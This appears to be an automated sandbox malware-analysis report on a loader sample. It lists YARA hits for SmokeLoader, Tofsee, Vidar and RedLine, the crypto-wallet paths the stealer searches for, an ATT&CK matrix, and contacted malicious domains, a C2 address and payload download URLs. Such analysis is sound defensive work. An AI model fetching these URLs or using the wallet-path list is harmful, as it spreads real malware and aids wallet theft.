
Show sources

Source: Yara match	File source: 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EC9F.exe PID: 6732, type: MEMORYSTR

Yara detected Tofsee

Show sources

Source: Yara match	File source: 26.2.2B8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.2B8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.2B8.exe.47c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.2B8.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000003.426261967.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.462876681.00000000047C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.461892339.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2B8.exe PID: 5780, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: ElectrumLTC
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: ElectronCash
Source: EC9F.exe, 00000017.00000002.413041502.0000000002E2A000.00000004.00000020.sdmp	String found in binary or memory: \Electrum\wallets\
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: Jaxx Liberty
Source: EC9F.exe, 00000017.00000002.413041502.0000000002E2A000.00000004.00000020.sdmp	String found in binary or memory: window-state.json
Source: EC9F.exe, 00000017.00000002.413041502.0000000002E2A000.00000004.00000020.sdmp	String found in binary or memory: exodus.conf.json
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: info.seco
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: \Exodus\
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: ElectrumLTC
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: passphrase.json
Source: EC9F.exe, 00000017.00000002.413041502.0000000002E2A000.00000004.00000020.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: \Ethereum\
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: \Exodus\
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: Ethereum
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: default_wallet
Source: EC9F.exe, 00000017.00000002.413041502.0000000002E2A000.00000004.00000020.sdmp	String found in binary or memory: file__0.localstorage
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: \MultiDoge\
Source: EC9F.exe, 00000017.00000002.413041502.0000000002E2A000.00000004.00000020.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: seed.seco
Source: EC9F.exe, 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	String found in binary or memory: keystore
Source: EC9F.exe, 00000017.00000002.413041502.0000000002E2A000.00000004.00000020.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Source: Yara match	File source: 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EC9F.exe PID: 6732, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 31.2.1F0B.exe.443bbb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.1F0B.exe.42ffa30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.1F0B.exe.443bbb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.1F0B.exe.42ffa30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.473714109.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.473902157.0000000004351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 3.2.cz2ZyeL2Zd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cz2ZyeL2Zd.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.cz2ZyeL2Zd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.icgujuh.2c315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.cz2ZyeL2Zd.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.icgujuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cz2ZyeL2Zd.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.icgujuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cz2ZyeL2Zd.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.328560589.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.398652642.00000000023A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.377828277.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.328581526.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.377862377.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.398263748.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.316265354.0000000002E01000.00000020.00020000.sdmp, type: MEMORY

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EC9F.exe PID: 6732, type: MEMORYSTR

Yara detected Tofsee

Show sources

Source: Yara match	File source: 26.2.2B8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.2B8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.2B8.exe.47c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.2B8.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000003.426261967.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.462876681.00000000047C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.461892339.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2B8.exe PID: 5780, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools111	Input Capture1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer14	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API52	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information11	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Windows Service1	Windows Service1	Obfuscated Files or Information4	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution1	Logon Script (Mac)	Process Injection512	Software Packing33	NTDS	System Information Discovery225	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter2	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol125	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Service Execution1	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Security Software Discovery451	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading31	Proc Filesystem	Virtualization/Sandbox Evasion231	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion231	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection512	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
cz2ZyeL2Zd.exe	34%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\rljdetbq.exe	100%	Avira	TR/Crypt.EPACK.Gen2
C:\Users\user\AppData\Local\Temp\5D68.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\AEFA.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\BFF4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1F0B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\rljdetbq.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ecgujuh	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1F0B.exe	43%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\1F0B.exe	67%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\5D68.exe	37%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\5D68.exe	86%	ReversingLabs	Win32.Ransomware.Lockbitcrypt
C:\Users\user\AppData\Local\Temp\8FB8.exe	14%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\8FB8.exe	61%	ReversingLabs	Win32.Trojan.SpyNoon
C:\Users\user\AppData\Local\Temp\AEFA.exe	49%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AEFA.exe	96%	ReversingLabs	Win32.Ransomware.StopCrypt
C:\Users\user\AppData\Local\Temp\BFF4.exe	40%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\BFF4.exe	96%	ReversingLabs	Win32.Ransomware.StopCrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.0.cz2ZyeL2Zd.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.1.cz2ZyeL2Zd.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.cz2ZyeL2Zd.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cz2ZyeL2Zd.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
17.2.icgujuh.2c315a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.3.5D68.exe.5a0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.0.icgujuh.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.2.5D68.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
26.2.2B8.exe.47c0e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
18.2.icgujuh.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cz2ZyeL2Zd.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cz2ZyeL2Zd.exe.400000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.2.cz2ZyeL2Zd.exe.2dc15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
26.2.2B8.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
26.3.2B8.exe.47e0000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.2.5D68.exe.580e50.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.0.icgujuh.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cz2ZyeL2Zd.exe.400000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
23.2.EC9F.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
23.3.EC9F.exe.2d50000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
18.1.icgujuh.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cz2ZyeL2Zd.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
23.2.EC9F.exe.2d20e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
18.0.icgujuh.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.cz2ZyeL2Zd.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File

Domains

Source	Detection	Scanner	Link
unicupload.top	15%	Virustotal	Browse
amogohuigotuli.at	13%	Virustotal	Browse
host-data-coin-11.com	16%	Virustotal	Browse
privacytools-foryou-777.com	10%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://schemas.mi	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://data-host-coin-8.com/files/9993_1641737702_2517.exe	100%	Avira URL Cloud	malware
http://amogohuigotuli.at/	0%	URL Reputation	safe
http://185.7.214.171:8080/6.php	100%	URL Reputation	malware
http://host-data-coin-11.com/	0%	URL Reputation	safe
http://data-host-coin-8.com/game.exe	100%	Avira URL Cloud	malware
http://data-host-coin-8.com/files/2184_1641247228_8717.exe	100%	Avira URL Cloud	malware
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://file-file-host4.com/tratata.php	0%	URL Reputation	safe
pa:443	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://unicupload.top/install5.exe	100%	URL Reputation	phishing
http://unic11m.top/install1.exe	100%	Avira URL Cloud	malware
http://data-host-coin-8.com/files/2150_1641729871_1812.exe	0%	Avira URL Cloud	safe
http://file-coin-host-12.com/	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
parubey.info:443	100%	Avira URL Cloud	malware
http://schemas.micr	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://t0.ssl.ak.tiles.	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://185.233.81.115/32739433.dat?iddqd=1	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe
http://unicupload.top/install1.exe	100%	Avira URL Cloud	malware
http://privacytools-foryou-777.com/downloads/toolspab1.exe	100%	Avira URL Cloud	malware
http://help.disneyplus.com.	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
unicupload.top	54.38.220.85	true	true	15%, Virustotal, Browse	unknown
amogohuigotuli.at	211.169.6.249	true	true	13%, Virustotal, Browse	unknown
host-data-coin-11.com	47.251.44.201	true	true	16%, Virustotal, Browse	unknown
bit.ly	67.199.248.10	true	false		high
bitly.com	67.199.248.14	true	false		high
cdn.discordapp.com	162.159.130.233	true	false		high
privacytools-foryou-777.com	47.251.44.201	true	true	10%, Virustotal, Browse	unknown
data-host-coin-8.com	47.251.44.201	true	true		unknown
unic11m.top	54.38.220.85	true	true		unknown
srtuiyhuali.at	unknown	unknown	true		unknown
fufuiloirtu.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://data-host-coin-8.com/files/9993_1641737702_2517.exe	true	Avira URL Cloud: malware	unknown
http://amogohuigotuli.at/	false	URL Reputation: safe	unknown
http://185.7.214.171:8080/6.php	true	URL Reputation: malware	unknown
http://host-data-coin-11.com/	true	URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/928021103304134716/928938539171864596/Dulling.exe	false		high
https://bitly.com/a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe	false		high
http://data-host-coin-8.com/game.exe	true	Avira URL Cloud: malware	unknown
http://data-host-coin-8.com/files/2184_1641247228_8717.exe	true	Avira URL Cloud: malware	unknown
https://bit.ly/3eHgQQR	false		high
http://file-file-host4.com/tratata.php	true	URL Reputation: safe	unknown
pa:443	true	Avira URL Cloud: safe	low
http://unicupload.top/install5.exe	true	URL Reputation: phishing	unknown
http://unic11m.top/install1.exe	true	Avira URL Cloud: malware	unknown
http://data-host-coin-8.com/files/2150_1641729871_1812.exe	false	Avira URL Cloud: safe	unknown
http://file-coin-host-12.com/	true	URL Reputation: safe	unknown
parubey.info:443	true	Avira URL Cloud: malware	unknown
https://185.233.81.115/32739433.dat?iddqd=1	true	Avira URL Cloud: safe	unknown
http://unicupload.top/install1.exe	true	Avira URL Cloud: malware	unknown
http://privacytools-foryou-777.com/downloads/toolspab1.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.mi	explorer.exe, 0000000D.00000000.311044019.000000000EE50000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.323664630.000000000EE50000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	B729.exe.13.dr	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000008.00000002.308084699.00000213CFA3D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308090278.00000213CFA40000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000008.00000003.307629652.00000213CFA4B000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308109021.00000213CFA4D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000008.00000003.307737326.00000213CFA41000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308095122.00000213CFA42000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000008.00000003.307629652.00000213CFA4B000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000008.00000003.307737326.00000213CFA41000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308095122.00000213CFA42000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0D	B729.exe.13.dr	false	URL Reputation: safe	unknown
http://www.bingmapsportal.com	svchost.exe, 00000008.00000002.308057545.00000213CFA13000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000008.00000002.308084699.00000213CFA3D000.00000004.00000001.sdmp	false		high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	false		high
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000014.00000003.378825069.00000246D0F93000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.379055077.00000246D0FB4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/ip	1F0B.exe, 0000001F.00000002.473714109.00000000041E1000.00000004.00000001.sdmp, 1F0B.exe, 0000001F.00000002.473902157.0000000004351000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000008.00000003.307731625.00000213CFA45000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Transit/Stops/	svchost.exe, 00000008.00000002.308147603.00000213CFA69000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307368032.00000213CFA67000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000008.00000002.308084699.00000213CFA3D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	false		high
http://crl.ver)	svchost.exe, 00000014.00000002.405174140.00000246D08ED000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307716871.00000213CFA46000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308100532.00000213CFA47000.00000004.00000001.sdmp	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000014.00000003.384055580.00000246D0FAE000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.384040858.00000246D0FC5000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.384024373.00000246D0FC5000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.384071016.00000246D1402000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.383987062.00000246D0F7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.384007011.00000246D0F8D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000008.00000002.308084699.00000213CFA3D000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308057545.00000213CFA13000.00000004.00000001.sdmp	false		high
http://schemas.micr	explorer.exe, 0000000D.00000000.311044019.000000000EE50000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.323664630.000000000EE50000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://%s.xboxlive.com	svchost.exe, 00000006.00000002.543597107.000001D194A44000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000008.00000003.307629652.00000213CFA4B000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308109021.00000213CFA4D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	B729.exe.13.dr	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.	svchost.exe, 00000008.00000003.307766407.00000213CFA39000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307716871.00000213CFA46000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308100532.00000213CFA47000.00000004.00000001.sdmp	false		high
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000014.00000003.378825069.00000246D0F93000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.379055077.00000246D0FB4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dynamic.t	svchost.exe, 00000008.00000002.308109021.00000213CFA4D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	B729.exe.13.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	false		high
https://disneyplus.com/legal.	svchost.exe, 00000014.00000003.378825069.00000246D0F93000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.379055077.00000246D0FB4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307716871.00000213CFA46000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308100532.00000213CFA47000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 00000006.00000002.543597107.000001D194A44000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	false		high
http://help.disneyplus.com.	svchost.exe, 00000014.00000003.378825069.00000246D0F93000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.379055077.00000246D0FB4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://%s.dnet.xboxlive.com	svchost.exe, 00000006.00000002.543597107.000001D194A44000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000008.00000003.307629652.00000213CFA4B000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
188.166.28.199	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	false
148.0.74.229	unknown	Dominican Republic	6400	CompaniaDominicanadeTelefonosSADO	false
